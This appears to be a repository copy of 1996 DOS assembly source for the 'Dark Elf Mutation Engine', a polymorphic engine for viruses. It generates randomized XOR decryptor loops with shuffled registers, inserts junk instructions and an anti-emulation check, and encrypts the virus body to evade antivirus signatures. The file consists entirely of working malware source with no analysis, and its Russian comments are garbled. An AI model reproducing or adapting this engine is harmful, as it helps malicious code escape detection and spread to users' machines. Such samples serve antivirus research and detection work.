MalwareSourceCode/Engines/Virus.Win32.DarkElf.asm

822 lines
13 KiB
NASM
Raw Normal View History

2020-10-10 02:50:53 +00:00
Ŀ
; <20> Dark Elf Mutation Engine [DEME] v1.1 CopyLeft (cl) MSTUdent 1996 <09>

;
;<3B><><EFBFBD><EFBFBD>ணࠬ<E0AEA3><E0A0AC> :
; DEME - ᠬ Mutation <20> <20><><EFBFBD><EFBFBD>
; Randomize - <><EEA7A0> <20><><EFBFBD><EFBFBD> 40h
; RND - AX = RND(65536)
PUSHSTATE
IDEAL
LOCALS @@
DEME_MaxDecoderLen=1500
proc DEME
;<3B><><EFBFBD><E0A0AC><EFBFBD><EFBFBD> :
;es:di - <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><EFBFBD> <20><><EFBFBD><EFBFBD>ᠭ १<><E0A5A7><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; ࠧ<><E0A0A7><EFBFBD>_<EFBFBD><5F><EFBFBD><EFBFBD><EFBFBD><EFBFBD> = ࠧ<><E0A0A7><EFBFBD>_<EFBFBD><5F><EFBFBD><E5AEA4><EFBFBD><EFBFBD>_<EFBFBD><5F><EFBFBD><EFBFBD> + 1500
;ds:si - <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>, <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><E5AEA4><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><E0AEA2><EFBFBD>
;dx - <20><><EFBFBD><EFBFBD><EFBFBD> <20>ਢ離<E0A8A2> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>஢騪<E0AEA2> (<28><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> ORG xxxx)
;bx - ࠧ<><E0A0A7><EFBFBD> <20><><EFBFBD><E5AEA4><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> (<28> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>)
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> :
;cx - <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><E7A5AD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> (<28> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>)
pushf
push bx di si ds
push cs
pop ds
cld
inc bx
shr bx,1
mov [DEME_CodeLen],bx
mov [DEME_Origin],dx
mov [DEME_BuffOffs],di
call Randomize
call DEME_ChooseRegs
call DEME_GenProlog
call DEME_GenCrypt
call DEME_GenEpilog
pop ds si
call DEME_Encode
mov cx,di
pop di bx
sub cx,di
popf
ret
endp DEME
R_AX=00000000b
R_CX=00000001b
R_DX=00000010b
R_BX=00000011b
R_SP=00000100b
R_BP=00000101b
R_SI=00000110b
R_DI=00000111b
M_AX=00000001b
M_CX=00000010b
M_DX=00000100b
M_BX=00001000b
M_SP=00010000b
M_BP=00100000b
M_SI=01000000b
M_DI=10000000b
M_INDEX=M_BX+M_SI+M_DI
M_ALL=M_AX+M_CX+M_DX+M_BX+M_BP+M_SI+M_DI
DEME_ID db '[DEME] Dark Elf Mutation Engine v1.1',0
DEME_CopyLeft db 'CopyLeft (cl) MSTUdent',0
DEME_Date db ??date,0,??time,0
proc DEME_Encode near
push ax bx cx dx si
mov cx,[DEME_CodeLen]
mov dx,[DEME_Key]
@@1:
lodsw
xor ax,dx
stosw
add dx,[DEME_KeyAdd]
loop @@1
pop si dx cx bx ax
ret
endp DEME_Encode
proc DEME_ChooseRegs near
push ax
mov [DEME_MaskUsed],M_SP
mov al,M_INDEX
call DEME_GetAnyReg
mov [DEME_RegIndex],ax
mov al,M_ALL
call DEME_GetAnyReg
mov [DEME_RegCounter],ax
mov al,M_ALL
call DEME_GetAnyReg
mov [DEME_RegKey],ax
pop ax
ret
endp DEME_ChooseRegs
proc DEME_GenProlog near
push ax bx cx dx
call DEME_GenRandomSeq
call DEME_GenAntiWeb
mov bx,offset DEME_GenLoadIndex
mov cx,offset DEME_GenLoadKey
mov dx,offset DEME_GenLoadCounter
call DEME_MixRegs
call DEME_GenRandomSeq
call bx
call DEME_GenRandomSeq
call dx
call DEME_GenRandomSeq
call cx
call DEME_GenRandomSeq
pop dx cx bx ax
ret
endp DEME_GenProlog
proc DEME_GenAntiWeb
push ax bx cx
mov cl,[DEME_MaskUsed]
test cl,M_AX
je @@1
mov al,050h
stosb
call DEME_GenRandomSeq
@@1:
or [DEME_MaskUsed],M_AX
mov ax,41e4h
stosw
call DEME_GenRandomSeq
mov ax,1100010010001000b
stosw
call DEME_GenRandomSeq
mov ax,41e4h
stosw
call DEME_GenRandomSeq
mov ax,1100010000110000b
stosw
mov al,01110101b
stosw
mov bx,di
call DEME_GenRandomSeq
mov ax,4cb4h
stosw
mov ax,21cdh
stosw
call DEME_GenRandomSeq
mov ax,di
sub ax,bx
mov [es:bx-1],al
test cl,M_AX
je @@2
mov al,058h
stosb
call DEME_GenRandomSeq
@@2:
mov [DEME_MaskUsed],cl
pop cx bx ax
ret
endp DEME_GenAntiWeb
proc DEME_GenLoadIndex near
push ax
mov ax,[DEME_RegIndex]
or al,10111000b
stosb
mov [DEME_AddrBeg],di
stosw
pop ax
ret
endp DEME_GenLoadIndex
proc DEME_GenLoadKey near
push ax bx
call RND
mov bx,ax
mov [DEME_Key],ax
mov ax,[DEME_RegKey]
call DEME_GenLoadReg16
pop bx ax
ret
endp DEME_GenLoadKey
proc DEME_GenLoadCounter near
push ax bx
mov ax,[DEME_RegCounter]
mov bx,[DEME_CodeLen]
call DEME_GenLoadReg16
pop bx ax
ret
endp DEME_GenLoadCounter
proc DEME_GenCrypt near
push ax bx cx dx
mov [DEME_LoopAddr],di
call DEME_GenRandomSeq
call DEME_GenXorCmd
mov dx,offset DEME_GenIncIndex
mov bx,offset DEME_GenAddKey
mov cx,offset DEME_GenDecCounter
call DEME_MixRegs
call DEME_GenRandomSeq
call bx
call DEME_GenRandomSeq
call dx
call DEME_GenRandomSeq
call cx
call DEME_GenRandomSeq
call DEME_GenCloseCycle
call DEME_GenRandomSeq
pop dx cx bx ax
ret
endp DEME_GenCrypt
proc DEME_GenXorCmd near
push ax bx
mov al,2eh
stosb
mov al,00110001b
stosb
mov bx,[DEME_RegIndex]
cmp bx,R_BX
jne @@1
mov al,00000111b
@@1:
cmp bx,R_SI
jne @@2
mov al,00000100b
@@2:
cmp bx,R_DI
jne @@3
mov al,00000101b
@@3:
mov bx,[DEME_RegKey]
shl bl,3
or al,bl
stosb
pop bx ax
ret
endp DEME_GenXorCmd
proc DEME_GenIncIndex near
push ax bx
mov bx,[DEME_RegIndex]
call RND
and ax,3
or al,al
jne @@1
mov al,01000000b
or al,bl
stosb
stosb
jmp @@Exit
@@1:
dec al
jne @@2
mov al,10000001b
stosb
mov al,11000000b
or al,bl
stosb
mov ax,2
stosw
jmp @@Exit
@@2:
dec al
jne @@3
mov al,10000001b
stosb
mov al,11101000b
or al,bl
stosb
mov ax,-2
stosw
jmp @@Exit
@@3:
call DEME_GetUnusedReg
mov bx,2
call DEME_GenLoadReg16
mov bx,[DEME_RegIndex]
mov bh,al
shl bh,3
mov al,00000001b
stosb
mov al,11000000b
or al,bl
or al,bh
stosb
@@Exit:
pop bx ax
ret
endp DEME_GenIncIndex
proc DEME_GenAddKey near
push ax bx
mov bx,[DEME_RegKey]
call RND
mov [DEME_KeyAdd],ax
push ax
call RND
xor ah,ah
test al,00000100b
je @@1
neg [DEME_KeyAdd]
mov ah,00101000b
@@1:
mov al,10000001b
stosb
mov al,11000000b
xor al,ah
or al,bl
stosb
pop ax
stosw
@@Exit:
pop bx ax
ret
endp DEME_GenAddKey
proc DEME_GenDecCounter near
push ax bx
mov bx,[DEME_RegCounter]
call RND
and ax,3
or al,al
jne @@1
mov al,01001000b
or al,bl
stosb
jmp @@Exit
@@1:
dec al
jne @@2
mov al,10000001b
stosb
mov al,11000000b
or al,bl
stosb
mov ax,-1
stosw
jmp @@Exit
@@2:
dec al
jne @@3
mov al,10000001b
stosb
mov al,11101000b
or al,bl
stosb
mov ax,1
stosw
jmp @@Exit
@@3:
call DEME_GetUnusedReg
mov bx,1
call DEME_GenLoadReg16
mov bx,[DEME_RegCounter]
mov bh,al
shl bh,3
mov al,00101001b
stosb
mov al,11000000b
or al,bl
or al,bh
stosb
@@Exit:
pop bx ax
ret
endp DEME_GenDecCounter
proc DEME_GenCloseCycle near
push ax bx cx dx
call RND
and ax,3
shl ax,1
mov bx,ax
call [DEME_Clos1Tbl+bx]
call RND
test al,1
je @@1
mov al,10011100b
stosb
call DEME_GenRandomSeq
mov al,10011101b
stosb
@@1:
call [DEME_Clos2Tbl+bx]
call DEME_GenRandomSeq
call DEME_ClosJmp
call DEME_GenRandomSeq
call DEME_ClosJmpShort
call DEME_GenRandomSeq
pop dx cx bx ax
ret
endp DEME_GenCloseCycle
DEME_Clos1Tbl dw offset DEME_Clos11
dw offset DEME_Clos12
dw offset DEME_Clos13
dw offset DEME_Clos14
DEME_Clos2Tbl dw offset DEME_Clos21
dw offset DEME_Clos22
dw offset DEME_Clos21
dw offset DEME_Clos21
proc DEME_Clos11 near
push ax bx
mov al,10000001b
stosb
mov ax,[DEME_RegCounter]
or al,11111000b
stosb
xor ax,ax
stosw
pop bx ax
ret
endp DEME_Clos11
proc DEME_Clos12 near
push ax bx
mov al,10000001b
stosb
mov ax,[DEME_RegCounter]
or al,11111000b
stosb
xor ax,ax
inc ax
stosw
pop bx ax
ret
endp DEME_Clos12
proc DEME_Clos13 near
push ax bx
mov al,00001001b
stosb
mov ax,[DEME_RegCounter]
mov ah,11000000b
or ah,al
shl al,3
or al,ah
stosb
pop bx ax
ret
endp DEME_Clos13
proc DEME_Clos14 near
push ax bx
mov al,11110111b
stosb
mov ax,[DEME_RegCounter]
or al,11000000b
stosb
xor ax,ax
dec ax
stosw
pop bx ax
ret
endp DEME_Clos14
proc DEME_Clos21 near
push ax
mov al,01110100b
stosb
mov [DEME_JmpShort],di
stosb
pop ax
ret
endp DEME_Clos21
proc DEME_Clos22 near
push ax
mov al,01110010b
stosb
mov [DEME_JmpShort],di
stosb
pop ax
ret
endp DEME_Clos22
proc DEME_ClosJmp near
push ax
mov al,11101001b
stosb
mov ax,[DEME_LoopAddr]
sub ax,di
dec ax
dec ax
stosw
pop ax
ret
endp DEME_ClosJmp
proc DEME_ClosJmpShort near
push ax bx
mov ax,di
mov bx,[DEME_JmpShort]
sub ax,bx
dec ax
mov [es:bx],al
pop bx ax
ret
endp DEME_ClosJmpShort
proc DEME_GenEpilog near
push ax bx dx
call RND
and ax,3fh
inc ax
@@1:
call DEME_GenTrash
dec ax
jnz @@1
mov bx,[DEME_AddrBeg]
mov dx,di
sub dx,[DEME_BuffOffs]
add dx,[DEME_Origin]
mov [es:bx],dx
pop dx bx ax
ret
endp DEME_GenEpilog
proc DEME_MixRegs near
push ax
call RND
test al,1
je @@1
xchg bx,cx
@@1:
test al,2
je @@2
xchg cx,dx
@@2:
test al,4
je @@3
xchg bx,dx
@@3:
pop ax
ret
endp DEME_MixRegs
proc Randomize near
push ax
in ax,40h
mov [seed1],ax
pop ax
ret
endp Randomize
proc RND near
push dx
mov ax,[seed]
xor ax,[seed1]
mul ax
mov al,dl
mov [seed],ax
pop dx
ret
endp RND
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
proc DEME_GenRandomSeq near
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
push ax
call RND
and ax,0fh
inc ax
@@1:
call DEME_GenTrash
dec ax
jnz @@1
pop ax
ret
endp DEME_GenRandomSeq
proc DEME_GenTrash near
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> '<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>' <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
push ax bx
call RND
and ax,3
shl ax,1
mov bx,ax
call [DEME_TrashTbl+bx]
pop bx ax
ret
endp DEME_GenTrash
DEME_TrashTbl dw offset DEME_GenCmd1
dw offset DEME_GenCmd2
dw offset DEME_GenCmd3
dw offset DEME_GenCmd4
proc DEME_GenCmd1 near
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> 1-<2D><><EFBFBD><EFBFBD><E2AEA2> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> AX
ret
push ax bx
test [DEME_MaskUsed],M_AX
jne @@Exit
call RND
and ax,7
mov bx,ax
mov al,[DEME_Cmds1+bx]
stosb
@@Exit:
pop bx ax
ret
endp DEME_GenCmd1
DEME_Cmds1 db 00110111b ;aaa
db 00111111b ;aas
db 10011000b ;cbw
db 00100111b ;daa
db 00101111b ;das
db 01001000b ;dec ax
db 01000000b ;inc ax
db 10011111b ;lahf
proc DEME_GenCmd2 near
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> 1-<2D><><EFBFBD><EFBFBD><E0A0AD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
push ax bx
call RND
and ax,0fh
mov bx,ax
shl bx,1
mov al,[DEME_Cmds2+bx]
stosb
mov bl,[DEME_Cmds2+bx+1]
call DEME_GetUnusedReg
or al,bl
stosb
pop bx ax
ret
endp DEME_GenCmd2
DEME_Cmds2 db 0d1h,11000000b ;rol
db 0d1h,11001000b ;ror
db 0d1h,11010000b ;rcl
db 0d1h,11011000b ;rcr
db 0d1h,11100000b ;shl
db 0d1h,11101000b ;shr
db 0ffh,11000000b ;inc
db 0ffh,11001000b ;dec
db 0f7h,11010000b ;not
db 0f7h,11011000b ;neg
db 0d3h,11000000b ;rol cl
db 0d3h,11001000b ;ror cl
db 0d3h,11010000b ;rcl cl
db 0d3h,11011000b ;rcr cl
db 0d3h,11100000b ;shl cl
db 0d3h,11101000b ;shr cl
proc DEME_GenCmd3 near
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> 2-<2D> <20><><EFBFBD><EFBFBD><E0A0AD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><E2A2A5><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><E7A5AD><EFBFBD>
push ax bx
mov al,[DEME_MaskUsed]
push ax
or [DEME_MaskUsed],M_AX ;<3B><><EFBFBD> AX <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD>
call RND
xor ah,ah
mov bl,9
div bl
mov bl,ah
xor bh,bh
shl bx,1
mov al,[DEME_Cmds3+bx]
stosb
mov bl,[DEME_Cmds3+bx+1]
call DEME_GetUnusedReg
or al,bl
stosb
call RND
stosw
pop ax
mov [DEME_MaskUsed],al
pop bx ax
ret
endp DEME_GenCmd3
DEME_Cmds3 db 081h,11000000b ;add
db 081h,11010000b ;adc
db 081h,11101000b ;sub
db 081h,11110000b ;xor
db 0f7h,11000000b ;test
db 081h,11011000b ;sbb
db 081h,11001000b ;or
db 081h,11111000b ;cmp
db 081h,11100000b ;and
; db 0c7h,11000000b ;mov
proc DEME_GenCmd4 near
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> 2-<2D> <20><><EFBFBD><EFBFBD><E0A0AD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
push ax bx cx dx
call RND
xor ah,ah
mov bl,10
div bl
mov bl,ah
xor bh,bh
mov al,[DEME_Cmds4+bx]
stosb
call DEME_GetUnusedReg
shl al,3
mov dl,al
call RND
and al,00000111b
or al,11000000b
or al,dl
stosb
pop dx cx bx ax
ret
endp DEME_GenCmd4
DEME_Cmds4 db 003h ;add
db 013h ;adc
db 02bh ;sub
db 033h ;xor
db 085h ;test
db 01bh ;sbb
db 00bh ;or
db 03bh ;cmp
db 023h ;and
db 08bh ;mov
proc DEME_GetUnusedReg near
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><E1AFAE><EFBFBD><EFBFBD><E3A5AC><><E0A5A3><EFBFBD><EFBFBD> (<28><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>)
push bx
mov bl,[DEME_MaskUsed]
mov al,M_ALL
call DEME_GetAnyReg
mov [DEME_MaskUsed],bl
pop bx
ret
endp DEME_GetUnusedReg
proc DEME_GetAnyReg near
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><E1AFAE><EFBFBD><EFBFBD><E3A5AC><><E0A5A3><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><E0A5A4><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD>
push bx cx
mov bl,al
not bl
or bl,[DEME_MaskUsed]
call RND
and ax,7
mov cl,al
mov ah,1
rol ah,cl
@@11:
test ah,bl
je @@12
inc al
and al,7
rol ah,1
jmp @@11
@@12:
or [DEME_MaskUsed],ah
and ax,7
pop cx bx
ret
endp DEME_GetAnyReg
proc DEME_GenLoadReg16 near
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><><E0A5A3><EFBFBD><EFBFBD><EFBFBD>
;ax - <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
;bx - 祬
push ax bx
and al,00000111b
or al,10111000b
stosb
mov ax,bx
stosw
pop bx ax
ret
endp DEME_GenLoadReg16
Seed dw 0
Seed1 dw 0
DEME_MaskUsed db 0
DEME_RegIndex dw 0
DEME_RegCounter dw 0
DEME_RegKey dw 0
DEME_Origin dw 0
DEME_BuffOffs dw 0
DEME_LoopAddr dw 0
DEME_JmpShort dw 0
DEME_CodeLen dw 0
DEME_Key dw 0
DEME_KeyAdd dw 0
DEME_AddrBeg dw 0
POPSTATE